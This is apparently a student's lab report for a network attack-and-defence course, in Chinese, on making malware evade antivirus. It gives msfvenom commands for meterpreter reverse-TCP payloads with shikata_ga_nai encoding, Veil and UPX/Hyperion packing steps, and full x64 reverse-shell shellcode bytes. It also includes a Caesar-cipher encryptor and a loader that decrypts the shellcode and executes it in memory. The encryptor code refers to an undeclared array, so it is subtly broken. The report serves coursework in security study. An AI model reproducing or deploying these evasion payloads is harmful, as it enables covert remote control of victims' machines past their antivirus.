20232313 2025-2026-1 《网络与系统攻防技术》实验三实验报告

1.实验内容

基本实验内容如下:

  • 学会使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
    veil,加壳工具
  • 使用C + shellcode编程
  • 通过组合应用各种技术实现恶意代码免杀
  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

实验要求回答问题及解答:

(1)杀软是如何检测出恶意代码的?

杀毒软件检测恶意代码主要通过以下几种技术:
①特征码检测:这是最基本的检测技术,杀毒软件通过比对恶意代码的特征码来识别病毒。特征码是一段能够唯一标识恶意代码的数据,可以是文件的MD5值或者文件中唯一存在的一段字符串。
②启发式扫描:启发式技术通过分析文件的行为和内容来检测病毒。它使用类似于人工智能的算法,根据病毒的行为模式和特征来识别恶意软件。如果文件的行为与已知的恶意软件相似,或者其内容包含可疑的代码模式,杀毒软件就会将其标记为潜在的病毒。
③行为分析:类似于启发式检测,但更侧重于程序运行时的行为。通过监视程序的行为,如文件操作、注册表操作、网络操作等,来判断其是否为恶意代码。
④机器学习:现代杀毒软件还采用了机器学习技术,通过分析大量的病毒样本和安全事件数据,自动学习病毒的行为模式和特征,然后利用这些知识来优化启发式扫描和主动防御算法,提高检测的响应速度和准确性。

(2)免杀是做什么?

免杀技术,指通过一系列的技术手段,使得安全软件无法识别出恶意代码的行为特征,从而绕过安全检测。

(3)免杀的基本方法有哪些?

免杀技术是一种使恶意软件逃避杀毒软件检测的方法,以下是几种常见的免杀手段:
① 静态免杀方法
代码混淆:通过变换恶意软件的代码结构、逻辑或数据,增加杀毒软件分析的难度,使得病毒特征难以被识别。
特征码修改:通过对恶意软件的特征码进行微调,使其与杀毒软件数据库中的特征码不匹配,从而避免被检测。
加壳与加密:对恶意软件进行加壳处理,即将其压缩并与其他代码结合,运行时再解压执行;同时,对代码进行加密,防止逆向工程分析。
② 动态免杀方法
内存注入:将恶意代码注入到正在运行的进程内存中,利用这些进程作为掩护执行恶意操作,以避开直接的文件系统检测。
行为模拟:在执行过程中,恶意软件模仿正常软件的行为模式,以规避杀毒软件的行为监控系统。
沙箱检测:恶意软件会检测自身是否运行在沙箱环境中,如果是,则不执行恶意行为,以免被沙箱分析技术捕获。
③ 其他免杀方法
条件编译:根据特定的编译条件,有选择性地编译恶意软件的某些部分,这样只有在满足特定条件下,恶意代码才会被编译并执行。
利用系统漏洞:通过利用操作系统或应用程序的漏洞,恶意软件可以绕过安全防护措施,这种技术需要对漏洞有深入的了解。合法文件利用:将恶意代码嵌入到常见的合法文件类型中,如图片、文档或办公软件文件,利用这些文件的普遍性来逃避杀毒软件的扫描。

2.实验过程

总共5个任务,如下:
(1)正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
(2)使用veil;
(3)使用C + shellcode编程;
(4)使用加壳工具;
(5)通过组合应用各种技术实现恶意代码免杀;同时用另一电脑实测,在杀软开启的情况下,能否运行并回连成功,注明电脑的杀软名称与版本。

我们一个一个来看。

(1)正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

(1.1)原理:

msf直接生成的带有payload特征码比较明显,容易被检测。如果使用编码器就可以改变payload的形态而不影响其功能,使得payload更难被检测出。

(1.2)步骤:

我们可以先看看msf可以生成哪些类型的包。输入msfvenom --list formats查看:
image
待会我们分别生成针对不同系统环境的.exe/.jar/.elf文件,并使用编码器对它们进行编码,在查看它们被检测的可能性。
1)msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=2213 -f exe > 20232313wzy.exe
一个针对windows的exe可执行文件,2213端口,反向连接。
2)msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.126.129 LPORT=2213 -f exe > 20232313wzy-2.exe
使用编码器对payload进行编码后的一个针对windows的exe可执行文件,2213端口,反向连接。
-e x86/shikata_ga_nai: 这指定了要使用的编码器;
-b ‘\x00’: 这指定了需要避免的坏字符集。
3)msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.126.129 LPORT=2213 -f exe > 20232313wzy-3.exe
多次对payload进行编码,-i 10表示编码10次;还是一个针对windows的exe可执行文件,2213端口,反向连接。
4)msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=2213 -f jar > 20232313wzy-4.jar
一个针对java的jar可执行文件,2213端口,反向连接。
5)msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=2213 -e x86/shikata_ga_nai -i 10 -f jar > 20232313wzy-5.jar
多次对payload进行编码,-i 10表示编码10次;还是一个针对java的jar可执行文件,2213端口,反向连接。
6)msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=2213 -f elf > 20232313wzy-6.elf
一个针对Linux的elf可执行文件,2213端口,反向连接。
7)msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=2213 -e x86/shikata_ga_nai -i 10 -f elf > 20232313wzy-7.elf
多次对payload进行编码,-i 10表示编码10次。还是一个针对Linux的elf可执行文件,2213端口,反向连接。

经过一番操作,得到七个包如下:
ad0b476f1dfe8bfd30671e084abc0aad

接着把这些包通过共享文件夹转移到主机上。如何创建共享文件夹在此不再赘述。
使用ls /mnt/hgfs可以查看到我们有一个共享文件夹VMware_share
使用cp 20232313wzy* /mnt/hgfs/VMware_share/可以将所有前缀为"20232313"的文件复制到这里面。
使用ls /mnt/hgfs/VMware_share/查看,发现转移成功。
fea9b758806082211d04554b63294e22
到我们的主机上,访问https://www.virustotal.com/来打开VirusTotal的链接。将包放入其中进行检测,结果如下:
bc00e9c936936f8b4bb69445e2d874ce
以上是针对windows的exe可执行文件;
82bc04177afcd011ee224faa154d8587
以上是payload进行编码后的一个针对windows的exe可执行文件;
49231d99daf979c23f6cb6a8fb9adfc9
以上是多次对payload进行编码的针对windows的exe可执行文件;
4a12136561eb0719564e950676c9a099
以上是针对java的jar可执行文件;
733f7b9b56a2494702884329c2075754
以上是多次对payload进行编码的针对java的jar可执行文件;
07611729d873494b546ee078d9929920
以上是针对Linux的elf可执行文件;
379076792434b9e4283efab42cc51ed5
以上是多次对payload进行编码针对Linux的elf可执行文件。
以上。可以看到:针对Linux的payload恶意文件再对payload多次编码后效果较好,其他环境的则效果一般。

(2)使用veil,生成一个.exe恶意文件

怎么下载veil,在此不做赘述,虽然我们有可能会花费大量的时间来完成这一步

(2.1)原理:

Veil 是一个专注于免杀的框架,可用于生成难以被传统杀毒软件检测的恶意Payload(如反向TCP Shell)。

(2.2)步骤:

输入veil进入。
输入use evasion,进入Evil—Evasion;
输入list,查看可使用的payload类型;
image
在这里我们使用c/meterpretermrev_tcp.py,即7号,所以输入use 7转到如下界面:
f70c650be3f6345d5679a89ff0600377
接下来依次输入配置:

set LHOST 192.168.126.129	 
set LPORT 2213	 
generate

37e91d9365798eae0969bc328995bde3
给文件命名为20232313_veil。
87a4257bd80e7ecad799a5966ff4055e
输入cd /var/lib/veil/output/compiled/,后输入ls /var/lib/veil/output/compiled/可以查看。
00b771f56daf330a3022bfc29d778261
找到文件后,输入cp /var/lib/veil/output/compiled/20232313_veil.exe /mnt/hgfs/VMware_share/将文件复制到共享文件夹。
4756462001f14c30b5d70dd3edda46be
移动到共享文件夹里,如上。
后在主机上打开链接https://www.virustotal.com/,放入文件,使用VirusTotal进行检测如下:
85a163d42cb62f85276db6d6339f9b70

(3)使用C + shellcode编程;

(3.1)原理:

制作一个用C语言编写的反向TCP Shellcode加载器。
C文件中buf[]数组里存放的是msf生成的机器码,功能是让目标机器主动连接攻击者的IP和端口,并提供一个远程Shell。
(int(*)())buf会把数组强制转换成函数指针并执行,让CPU直接运行这段机器码。
其特点是:无空字节、不依赖固定地址、直接调用系统API,可绕过部分安全检测。

(3.2)步骤:

输入cd /home/kali返回主界面。
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=2213 -f c来使用msf制作一个shellcode。
它被编写成了一个buf[]数组,我们需要利用C语言可以把数组强制转换成函数指针并执行,从而让CPU直接运行这段机器码的这一特性。
48d82f331735e8f920fc07eeddd630f1
使用touch 20232313.c获得一个新的空c文件。
编写如下C文件:
b6d9ce7a34f7609697023fdb640159f5
9b7effc751ec0c65b3f22fa15582e3be
输入i686-w64-mingw32-g++ 20232313.c -o 20232313.exe编译生成.exe文件。
输入cp 20232313.exe /mnt/hgfs/VMware_share/移动到共享文件夹后,在主机上打开链接https://www.virustotal.com/,放入文件,使用VirusTotal进行检测:
98014b764f849a85a21414db3a54cb2c

(4)使用加壳工具;

(4.1)原理:

Hyperion、UPX等加壳工具的核心作用是压缩、加密或混淆可执行文件,使其更难被分析或破解。
在这里学会使用即可。

(4.2)步骤:

输入upx 20232313.exe -o upx20232313.exe使用upx对之前的.exe文件加壳。
输入cp upx20232313.exe /mnt/hgfs/VMware_share转移到共享文件夹。
输入cd /usr/share/windows-resources/hyperion到hyperion目录,
输入sudo wine hyperion.exe -v upx20232313.exe upx20232313wzy.exe使用hyperion对upx加壳文件加壳。
c8cb9f2cdbfbbd8fffb0affb7cccf9f7
输入cp upx20232313wzy.exe /mnt/hgfs/VMware_share转移到共享文件夹。
f8f514f75968105a672e15e0739a65d3
移动到共享文件夹后,在主机上打开链接https://www.virustotal.com/,放入文件,使用VirusTotal进行检测:
9dd00689b69636a738a364c61e222435对于upx20232313.exe (upx加壳)
image对于upx20232313wzy.exe (hyperion加壳)

(5)通过组合应用各种技术实现恶意代码免杀;同时用另一电脑实测,在杀软开启的情况下,能否运行并回连成功,注明电脑的杀软名称与版本

(5.1)原理:

msfvenom生成Shellcode数组,再使用凯撒加密对数组进行加密,将加密后的密文放入txt文件中,再编写C语言代码,从txt文件中读取密文,解密并运行Shellcode,最后生成.exe可执行文件。

(5.2)步骤:

kali虚拟机中通过msfvenom生成Shellcode数组:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=10086 -f c
4067be50ca035e109d21461cdcf0f916
新建20232313_jiami.c文件,输入代码,代码功能为将复制内容放入shellcode1[]数组中,通过代码将shellcode进行凯撒加密,将密文输入到2313jiami.txt文件中;
以下是20232313_jiami.c:

#include <stdio.h>
#include<string.h>
//凯撒加密函数,适用于unsigned char数组
void caesarEncrypt(unsigned char *data, size_t length, int shift) {
for (size_t i = 0; i < length; i++) {
// 对每个字节进行位移
data[i]= (data[i] + shift) & 0xFF;
}
}
int main( ) {
unsigned char buf[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41"
"\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x8b\x48\x18\x44\x8b\x40\x20\x49\x01"
"\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x27\x66\xc0\xa8\x7e\x81\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";
int shift =3; // 加密位移 
printf("original: ");
for (size_t i = 0; i < 510; i++) {
printf("\\x%02x",shellcode1[i]);
}
printf("\n");
caesarEncrypt(shellcode1,510,shift); 
printf("Encrypted:");
for (size_t i =0;i< 510; i++){
printf("\\x%02x",shellcode1[i]); 
    }
printf("\n");
    FILE *file = fopen("2313jiami.txt", "w");
    if (file != NULL) {
        for (size_t i = 0; i < 510; i++) {
            fprintf(file, "\\x%02x", shellcode1[i]);
        }
        fprintf(file, "\n");
        fclose(file);
    } else {
        printf("Error opening file!\n");
    }
return 0;
}

在同文件夹下新建空文件2313jiami.txt,用以存放密文;后编辑并运行20232313_jiami.c;
运行后2313jiami.txt应该是有内容的。
新建20232313_jiemi.cpp文件,输入代码,代码功能为读取2313jiami.txt文件中的内容到shellcode1[]数组中,并进行解密,再运行shellcode;
以下为20232313_jiemi.cpp:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// 凯撒解密函数,适用于unsigned char数组
void caesarDecrypt(unsigned char *data, size_t length, int shift) {
    for (size_t i = 0; i < length; i++) {
        // 对每个字节进行位移
        data[i] = (unsigned char)((data[i] - shift + 256) % 256);
    }
}

int main() {
    int shift = 3; // 凯撒加密的位移值
    unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节
    char line[1024]; // 用于读取文件的临时缓冲区
    // 打开文件
    FILE *file = fopen("2313jiami.txt", "r");
    if (file == NULL) {
        perror("Error opening file");
        return 1;
    }
    // 读取文件内容到shellcode1数组中
    size_t length = 0;
    while (fgets(line, sizeof(line), file)) {
        // 将读取的十六进制字符串转换为字节并存储在shellcode1中
        for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {
            if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {
                length++;
            }
        }
    }
    fclose(file);

    // 解密shellcode
    caesarDecrypt(shellcode1, length, shift);

    // 输出解密后的shellcode
    /*printf("Decrypted Shellcode:\n");
    for (size_t i = 0; i < 510; i++) {
        printf("\\x%02x", shellcode1[i]);
    }
    printf("\n");*/

    // 分配内存并设置为可执行
    LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // 将解密后的shellcode复制到分配的内存中
    memcpy(exec, shellcode1, sizeof shellcode1);
    // 执行shellcode
    ((void(*)())exec)();

    return 0;
}

编译该文件,打开文件所在位置,可以看到如下文件:
056b5895aa270625e6deb3689603d5a9
20232313_jiemi.exe即为所需恶意文件。
我们尝试在Win7虚拟机中使用它。
在我们的主机上使用\\192.168.126.132\Shared访问Win7虚拟机的共享文件夹Shared,然后输入主机名\用户名 进入即可。
a4434074e7b5324748144129f5a1d145
通过共享文件夹将20232313_jiemi.exe文件以及2313jiami.txt文件传入win7虚拟机,并将两个文件放在桌面:
c6d236cb2090c7fe0a3ebc44594bc00f
传输后,发现可以与杀软共生:
b8dc41d851c016c41957fc44cf55a4fa
win7虚拟机里双击运行20232313_jiemi.exe看看能不能启动:
deb2ed76148ef1fe5ca11d42af6e91d0
发现神奇地运行不了。电脑的杀软名称与版本:360安全卫士极速版,15.0.2.1009

3.问题及解决方案

  • 问题1:我的veil在下载pip部分时一直卡住!

  • 问题1解决方案:换手机热点,不要使用学校的校园网!

  • 问题2:我的主机使用网络映射的方式建立共享文件夹,希望能在Win7虚拟机上访问,但是失败了(输入密码那部分总是出错)。
    我如何在Win7虚拟机上和我的Win11主机建立共享文件夹?

  • 问题2解决方案:
    我在Win7建立共享文件夹让我的主机访问,成功了。

4.学习感悟、思考等

站在巨人的肩膀上干活事半功倍。

参考资料

posted @ 2025-10-26 18:53  20232313-吴至远  阅读(12)  评论(0)    收藏  举报